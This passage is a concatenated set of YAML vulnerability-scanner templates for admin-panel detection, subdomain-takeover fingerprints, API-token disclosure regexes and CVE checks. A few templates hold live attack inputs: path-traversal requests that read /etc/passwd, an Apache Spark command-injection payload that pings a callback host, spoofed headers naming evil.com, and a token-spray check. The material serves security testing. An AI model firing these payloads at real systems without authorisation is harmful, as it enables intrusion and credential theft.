17 | words:
18 | - project not found
--------------------------------------------------------------------------------
/webview-addjavascript-interface.yaml:
--------------------------------------------------------------------------------
1 | id: webview-addjavascript-interface
2 |
3 | info:
4 | name: Webview addJavascript Interface Usage
5 | author: gaurang
6 | severity: info
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
--------------------------------------------------------------------------------
/X-Client-IP.yaml:
--------------------------------------------------------------------------------
1 | id: x-client-ip
2 |
3 | info:
4 | name: x-client-ip
5 | author: Kabilan S
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | # Example of sending some headers to the servers
11 | headers:
12 |
13 | X-Client-IP: "evil.com"
14 | path:
15 | - "{{BaseURL}}/"
16 | matchers:
17 | - type: word
18 | words:
19 | - "evil.com"
20 |
--------------------------------------------------------------------------------
/api/mailchimp-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: mailchimp-access-key-value
2 |
3 | info:
4 | name: Mailchimp API Value
5 | author: puzzlepeaches
6 | severity: info
7 | tags: exposure,token,mailchimp
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - "[0-9a-f]{32}-us[0-9]{1,2}"
19 |
--------------------------------------------------------------------------------
/api/sendgrid-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: sendgrid-api-key
2 |
3 | info:
4 | name: Sendgrid API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,sendgrid
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'
18 |
--------------------------------------------------------------------------------
/branch-key.yaml:
--------------------------------------------------------------------------------
1 | id: branch-key
2 |
3 | info:
4 | name: Branch.io Live Key
5 | author: 0xh7ml
6 | severity: info
7 | reference:
8 | - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
9 | tags: token,file
10 |
11 | file:
12 | - extensions:
13 | - all
14 |
15 | extractors:
16 | - type: regex
17 | regex:
18 | - "key_live_.{32}"
19 |
--------------------------------------------------------------------------------
/manage-engine-admanager-panel.yaml:
--------------------------------------------------------------------------------
1 | id: manage-engine-admanager-panel
2 |
3 | info:
4 | name: Manage Engine ADManager Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/authorization.do"
13 | matchers:
14 | - type: word
15 | words:
16 | - "ManageEngine - ADManager Plus"
17 |
--------------------------------------------------------------------------------
/sonarqube-token.yaml:
--------------------------------------------------------------------------------
1 | id: sonarqube-token
2 |
3 | info:
4 | name: SonarQube Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,sonarqube
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"
18 |
--------------------------------------------------------------------------------
/stripe-restricted-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-restricted-key
2 |
3 | info:
4 | name: Stripe Restricted Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,stripe
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'rk_(?:live|test)_[0-9a-zA-Z]{24}'
18 |
--------------------------------------------------------------------------------
/surge-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: surge-takeover
2 |
3 | info:
4 | name: surge takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - project not found
--------------------------------------------------------------------------------
/versa-sdwan.yaml:
--------------------------------------------------------------------------------
1 | id: versa-sdwan
2 |
3 | info:
4 | name: Versa Networks SD-WAN Application
5 | author: pdteam
6 | severity: info
7 | tags: panel,versa,sdwan
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/versa/login.html"
13 |
14 | redirects: true
15 | max-redirects: 2
16 | matchers:
17 | - type: word
18 | words:
19 | - "Versa Networks"
--------------------------------------------------------------------------------
/vm/saferoads-vms-login.yaml:
--------------------------------------------------------------------------------
1 | id: saferoads-vms-login
2 |
3 | info:
4 | name: Saferoads VMS Login
5 | author: dhiyaneshDk
6 | severity: info
7 | reference:
8 | - https://www.exploit-db.com/ghdb/6941
9 | tags: panel
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}/login.html'
15 | matchers:
16 | - type: word
17 | words:
18 | - 'Saferoads VMS'
--------------------------------------------------------------------------------
/werkzeug-debugger-detect.yaml:
--------------------------------------------------------------------------------
1 | id: werkzeug-debugger-detect
2 |
3 | info:
4 | name: Werkzeug debugger console
5 | author: pdteam
6 | severity: info
7 | tags: tech,werkzeug
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/console"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "Interactive Console
"
18 | part: body
19 |
--------------------------------------------------------------------------------
/bmc-panel-detect.yaml:
--------------------------------------------------------------------------------
1 | id: bmc-panel-detect
2 |
3 | info:
4 | name: BMC Discovery Outpost Panel Detect
5 | author: pikpikcu
6 | severity: info
7 | tags: panel,bmc
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/adminlogin"
13 |
14 | matchers:
15 | - type: word
16 | part: body
17 | words:
18 | - "BMC Discovery Outpost: Login"
19 |
--------------------------------------------------------------------------------
/jkstatus-manager.yaml:
--------------------------------------------------------------------------------
1 | id: jkstatus-manager
2 |
3 | info:
4 | name: JK Status Manager
5 | author: pdteam
6 | severity: low
7 | tags: config,status
8 |
9 | requests:
10 | - method: GET
11 | headers:
12 | X-Forwarded-For: "127.0.0.1"
13 | path:
14 | - "{{BaseURL}}/jkstatus/"
15 | matchers:
16 | - type: word
17 | words:
18 | - "JK Status Manager"
19 |
--------------------------------------------------------------------------------
/kinsta-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: kinsta-takeover
2 |
3 | info:
4 | name: kinsta takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - No Site For Domain
--------------------------------------------------------------------------------
/X-Remote-Addr.yaml:
--------------------------------------------------------------------------------
1 | id: x-remote-addr
2 |
3 | info:
4 | name: x-remote-addr
5 | author: Kabilan S
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | # Example of sending some headers to the servers
11 | headers:
12 |
13 | X-Remote-Addr: "evil.com"
14 | path:
15 | - "{{BaseURL}}/"
16 | matchers:
17 | - type: word
18 | words:
19 | - "evil.com"
20 |
--------------------------------------------------------------------------------
/api/artifactory-api-token.yaml:
--------------------------------------------------------------------------------
1 | id: artifactory-api-token
2 |
3 | info:
4 | name: Artifactory API Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,artifactory
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'
--------------------------------------------------------------------------------
/api/google-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: google-api-key
2 |
3 | info:
4 | name: Google API Key
5 | author: Swissky
6 | severity: info
7 | tags: exposure,token,google
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | - "{{BaseURL}}/hopfully404"
14 |
15 | extractors:
16 | - type: regex
17 | part: body
18 | regex:
19 | - "AIza[0-9A-Za-z\\-_]{35}"
20 |
--------------------------------------------------------------------------------
/cve/2017/CVE-2017-16877.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2017-16877
2 |
3 | info:
4 | name: Nextjs v2.4.1 LFI
5 | author: Loneyer
6 | severity: high
7 |
8 | rules:
9 | r0:
10 | request:
11 | method: GET
12 | path: /_next/../../../../../../../../../../etc/passwd
13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
14 | expression: r0()
15 |
16 |
--------------------------------------------------------------------------------
/discord-webhook.yaml:
--------------------------------------------------------------------------------
1 | id: discord-webhook
2 |
3 | info:
4 | name: Discord Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,discord
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+'
--------------------------------------------------------------------------------
/e-vulnerability/ikuai-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: ikuai-login-panel
2 |
3 | info:
4 | name: iKuai 登录爱快流控路由登录页面
5 | author: zan8in
6 | severity: info
7 | description: |
8 | title="登录爱快流控路由"
9 |
10 | rules:
11 | r0:
12 | request:
13 | method: GET
14 | path: /
15 | follow_redirects: true
16 | expression: response.status == 200 && response.body.bcontains(b'登录爱快流控路由')
17 | expression: r0()
--------------------------------------------------------------------------------
/httpbin-detection.yaml:
--------------------------------------------------------------------------------
1 | id: httpbin-detection
2 |
3 | info:
4 | name: HTTPBin Detection
5 | author: Adam Crosser
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/'
13 | redirects: false
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - 'Django administration")
15 | expression: r0()
--------------------------------------------------------------------------------
/a-fingerprinting/sonicwall-management-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sonicwall-management-panel
2 |
3 | info:
4 | name: SonicWall Management Panel
5 | author: PR3R00T
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /auth.html
14 | expression: response.status == 200 && response.body.bcontains(b'SonicWall - Authentication')
15 | expression: r0()
--------------------------------------------------------------------------------
/b-disclosure/hadoop-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: hadoop-disclosure
2 |
3 | info:
4 | name: Apache Hadoop Disclosure
5 | author: zan8in
6 | severity: low
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /dfshealth.html
14 | expression: response.status == 200 && response.body.bcontains(b'class="navbar-brand"') && response.body.bcontains(b'dfshealth.js')
15 | expression: r0()
--------------------------------------------------------------------------------
/c-unauthorized/frp-unauthenticated.yaml:
--------------------------------------------------------------------------------
1 | id: frp-unauthenticated
2 |
3 | info:
4 | name: FRP Unauthenticated
5 | author: pikpikcu
6 | severity: info
7 | verified: false
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /static
14 | expression: response.status == 200 && response.body.bcontains(b"frps dashboard")
15 | expression: r0()
16 |
--------------------------------------------------------------------------------
/c-unauthorized/kibana-unauth.yaml:
--------------------------------------------------------------------------------
1 | id: kibana-unauth
2 |
3 | info:
4 | name: Kibana Unauth
5 | author: Isaac(https://github.com/IsaacQiang)
6 | severity: high
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /app/kibana
14 | expression: response.status == 200 && response.body.bcontains(b".kibanaWelcomeView")
15 | expression: r0()
16 |
--------------------------------------------------------------------------------
/circleci.yaml:
--------------------------------------------------------------------------------
1 | id: api-circleci
2 |
3 | info:
4 | name: CircleCI API Test
5 | author: zzeitlin
6 | reference: https://circleci.com/docs/api/v1
7 | severity: info
8 | tags: token-spray,circle,circleci
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "https://circleci.com/api/v1.1/me?circle-token={{token}}"
14 |
15 | matchers:
16 | - type: status
17 | status:
18 | - 200
19 |
--------------------------------------------------------------------------------
/cve/2022/CVE-2022-33891.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2022-33891
2 |
3 | info:
4 | name: Apache Spark shell command injection vulnerability via Spark UI
5 | author: zan8in
6 | severity: high
7 |
8 | set:
9 | reverse: newReverse()
10 | reverseDomain: reverse.url.host
11 | rules:
12 | r0:
13 | request:
14 | method: GET
15 | path: /doAs?=`ping+{{reverseDomain}}`
16 | expression: reverse.wait(5)
17 | expression: r0()
--------------------------------------------------------------------------------
/dynamic-broadcast-receiver.yaml:
--------------------------------------------------------------------------------
1 | id: dynamic-registered-broadcast-receiver
2 |
3 | info:
4 | name: Dynamic Registered Broadcast Receiver
5 | author: gaurang
6 | severity: info
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)"
--------------------------------------------------------------------------------
/e-vulnerability/myucms-lfr.yaml:
--------------------------------------------------------------------------------
1 | id: myucms-lfr
2 |
3 | info:
4 | name: myucms lfr
5 | author: jinqi
6 | severity: high
7 |
8 | rules:
9 | r0:
10 | request:
11 | method: GET
12 | path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
14 | expression: r0()
15 |
16 |
--------------------------------------------------------------------------------
/git/github-enterprise-detect.yaml:
--------------------------------------------------------------------------------
1 | id: github-enterprise-detect
2 |
3 | info:
4 | name: Detect Github Enterprise
5 | author: ehsahil
6 | severity: info
7 | tags: panel,github
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/login"
13 |
14 | redirects: true
15 | max-redirects: 2
16 | matchers:
17 | - type: word
18 | words:
19 | - "GitHub · Enterprise"
20 |
--------------------------------------------------------------------------------
/google/google-storage.yaml:
--------------------------------------------------------------------------------
1 | id: gstorage-detect
2 |
3 | info:
4 | name: Google Bucket detection
5 | author: 0xTeles
6 | severity: info
7 | tags: tech,gstorage,google,bucket
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | matchers:
14 | - type: word
15 | words:
16 | - x-goog-metageneration
17 | - X-Goog-Metageneration
18 | part: header
19 |
--------------------------------------------------------------------------------
/jazzhr-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: jazzhr-takeover
2 |
3 | info:
4 | name: jazzhr takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - This account no longer active
--------------------------------------------------------------------------------
/mashery-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: mashery-takeover
2 |
3 | info:
4 | name: mashery takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - Unrecognized domain
--------------------------------------------------------------------------------
/newrelic-synthetics-location-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-synthetics-location-key
2 |
3 | info:
4 | name: Synthetics Location Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'
--------------------------------------------------------------------------------
/prometheus-exposed-panel.yaml:
--------------------------------------------------------------------------------
1 | id: prometheus-exposed-panel
2 |
3 | info:
4 | name: Prometheus.io exposed panel
5 | author: organiccrap
6 | severity: low
7 | tags: panel,prometheus
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/graph'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Prometheus Time Series Collection and Processing Server'
--------------------------------------------------------------------------------
/provider-path.yaml:
--------------------------------------------------------------------------------
1 | id: insecure-provider-path
2 |
3 | info:
4 | name: Insecure Provider Path
5 | author: gaurang
6 | severity: medium
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: regex
15 | regex:
16 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\""
17 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\""
18 |
--------------------------------------------------------------------------------
/selenoid-ui-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: selenoid-ui-exposure
2 |
3 | info:
4 | name: Selenoid UI Dashboard Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/admin/login'
13 | matchers:
14 | - type: word
15 | words:
16 | - "Selenoid UI"
17 | - "/manifest.json"
18 | condition: and
--------------------------------------------------------------------------------
/smugmug-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: smugmug-takeover
2 |
3 | info:
4 | name: smugmug takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - '{"text":"Page Not Found"'
--------------------------------------------------------------------------------
/surveygizmo-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: surveygizmo-takeover
2 |
3 | info:
4 | name: surveygizmo takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - data-html-name
--------------------------------------------------------------------------------
/tave-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: tave-takeover
2 |
3 | info:
4 | name: tave takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - "Error 404: Page Not Found
"
--------------------------------------------------------------------------------
/ansible-config-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: ansible-config-disclosure
2 |
3 | info:
4 | name: Ansible Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/ansible.cfg'
13 | matchers:
14 | - type: word
15 | words:
16 | - '[defaults]'
17 | - '[inventory]'
18 | condition: and
--------------------------------------------------------------------------------
/dotcms-admin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: dotcms-admin-panel
2 |
3 | info:
4 | name: dotAdmin Panel
5 | author: impramodsargar
6 | severity: info
7 | tags: panel,dotcms,cms
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/dotAdmin/"
13 |
14 | matchers-condition: and
15 | matchers:
16 | - type: word
17 | words:
18 | - 'dotCMS Content Management Platform'
19 |
--------------------------------------------------------------------------------
/e-vulnerability/web-config.yaml:
--------------------------------------------------------------------------------
1 | id: web-config
2 |
3 | info:
4 | name: Web Config file
5 | author: Yash Anand @yashanand155
6 | severity: info
7 | tags: config,exposure
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /web.config
14 | expression: response.status == 200 && response.body.bcontains(b'') && response.body.bcontains(b'')
15 | expression: r0()
--------------------------------------------------------------------------------
/fastly-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: fastly-takeover
2 |
3 | info:
4 | name: fastly takeover detection
5 | author: pdcommunity
6 | severity: info
7 | tags: takeover
8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}"
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - "Fastly error: unknown domain:"
--------------------------------------------------------------------------------
/hatenablog-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: hatenablog-takeover
2 |
3 | info:
4 | name: hatenablog takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - 404 Blog is not found
--------------------------------------------------------------------------------
/lazy-file.yaml:
--------------------------------------------------------------------------------
1 | id: lazy-file-manager
2 |
3 | info:
4 | name: Lazy File Manager
5 | author: amsda
6 | severity: medium
7 | tags: exposure
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/lfm.php"
13 | matchers-condition: and
14 | matchers:
15 | - type: status
16 | status:
17 | - 200
18 |
19 | - type: word
20 | words:
21 | - Lazy File Manager
--------------------------------------------------------------------------------
/readme-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: readme-takeover
2 |
3 | info:
4 | name: readme takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - 'Project doesnt exist... yet!'
20 |
--------------------------------------------------------------------------------
/server-status.yaml:
--------------------------------------------------------------------------------
1 | id: server-status-localhost
2 |
3 | info:
4 | name: Server Status Disclosure
5 | author: pdteam,geeknik
6 | severity: low
7 | tags: apache,debug
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/server-status"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "Apache Server Status"
18 | - "Server Version"
19 | condition: and
--------------------------------------------------------------------------------
/traefik-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: traefik-dashboard-detect
2 |
3 | info:
4 | name: Traefik Dashboard
5 | author: schniggie,StreetOfHackerR007
6 | severity: info
7 | tags: panel,traefik
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/dashboard/"
13 | matchers:
14 | - type: word
15 | words:
16 | - ""
17 | part: body
18 |
--------------------------------------------------------------------------------
/webmin/webmin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: webmin-panel
2 |
3 | info:
4 | name: Webmin Admin Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel,webmin
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | - "{{BaseURL}}/webmin/"
14 | redirects: true
15 | matchers:
16 | - type: word
17 | words:
18 | - "Login to Webmin"
19 | part: body
20 |
--------------------------------------------------------------------------------
/zendesk-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: zendesk-takeover
2 |
3 | info:
4 | name: zendesk takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - this help center no longer exists
--------------------------------------------------------------------------------
/api/artifactory-api-password.yaml:
--------------------------------------------------------------------------------
1 | id: artifactory-api-password
2 |
3 | info:
4 | name: Artifactory Password Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,artifactory
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'
--------------------------------------------------------------------------------
/api/zapier-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: zapier-webhook-token
2 |
3 | info:
4 | name: Zapier Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'
--------------------------------------------------------------------------------
/druid-console-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: druid-console-exposure
2 |
3 | info:
4 | name: Alibaba Druid Console Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel,alibaba,druid
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'src="/druid.js"'
18 | - 'href="/druid.css"'
19 | condition: and
20 |
--------------------------------------------------------------------------------
/electron-version-detect.yaml:
--------------------------------------------------------------------------------
1 | id: electron-version-detect
2 |
3 | info:
4 | name: Electron Version Detect
5 | author: me9187
6 | severity: info
7 | reference:
8 | - https://www.electronjs.org/blog/chromium-rce-vulnerability/
9 | tags: electron,file
10 |
11 | file:
12 | - extensions:
13 | - json
14 |
15 | extractors:
16 | - type: regex
17 | regex:
18 | - '"electronVersion":"[^"]*"'
19 |
--------------------------------------------------------------------------------
/exposed-webalizer.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-webalizer
2 |
3 | info:
4 | name: Publicly exposed Webalizer Interface
5 | author: pdteam
6 | severity: low
7 | tags: panel,webalizer
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/webalizer/'
13 | matchers:
14 | - type: word
15 | words:
16 | - "Webalizer Version"
17 | - "Usage statistics for"
18 | condition: and
19 |
--------------------------------------------------------------------------------
/feedpress-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: feedpress-takeover
2 |
3 | info:
4 | name: Agilecrm Takeover Detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - 'The feed has not been found.'
--------------------------------------------------------------------------------
/gemfury-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: gemfury-takeover
2 |
3 | info:
4 | name: gemfury takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - "404: This page could not be found."
--------------------------------------------------------------------------------
/memcached-stats.yaml:
--------------------------------------------------------------------------------
1 | id: memcached-stats
2 |
3 | info:
4 | name: Memcached stats disclosure
5 | author: pdteam
6 | severity: low
7 | tags: network,memcached
8 |
9 | network:
10 | - inputs:
11 | - data: "stats\r\n\r\nquit\r\n"
12 |
13 | host:
14 | - "{{Hostname}}"
15 | - "{{Host}}:11211"
16 | read-size: 2048
17 |
18 | matchers:
19 | - type: word
20 | words:
21 | - "STAT "
--------------------------------------------------------------------------------
/readthedocs-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: readthedocs-takeover
2 |
3 | info:
4 | name: readthedocs takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - unknown to Read the Docs
--------------------------------------------------------------------------------
/smartling-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: smartling-takeover
2 |
3 | info:
4 | name: smartling takeover detection
5 | author: pdcommunity
6 | severity: info
7 | tags: takeover
8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}"
14 | matchers:
15 | - type: word
16 | words:
17 | - Domain is not configured
18 |
--------------------------------------------------------------------------------
/teamwork-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: teamwork-takeover
2 |
3 | info:
4 | name: teamwork takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
8 | - https://github.com/EdOverflow/can-i-take-over-xyz
9 | tags: takeover
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - Oops - We didn't find your site.
--------------------------------------------------------------------------------
/zoho-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: zoho-webhook-token
2 |
3 | info:
4 | name: Zoho Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,zoho
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'
18 |
--------------------------------------------------------------------------------
/agilecrm-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: agilecrm-takeover
2 |
3 | info:
4 | name: agilecrm takeover detection
5 | author: pdteam
6 | severity: high
7 | reference:
